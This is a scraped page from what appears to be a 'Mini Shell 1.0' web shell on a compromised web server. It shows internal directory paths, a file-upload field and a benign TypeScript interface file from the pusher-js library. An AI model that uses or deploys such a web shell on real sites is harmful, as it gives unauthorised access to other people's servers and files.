HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/negocios.lapieza.do/node_modules/pusher-js/src/core/
Upload File :
Current File : /var/www/negocios.lapieza.do/node_modules/pusher-js/src/core/reachability.ts
import { default as EventsDispatcher } from './events/dispatcher';

interface Reachability extends EventsDispatcher {
  isOnline(): boolean;
}

export default Reachability;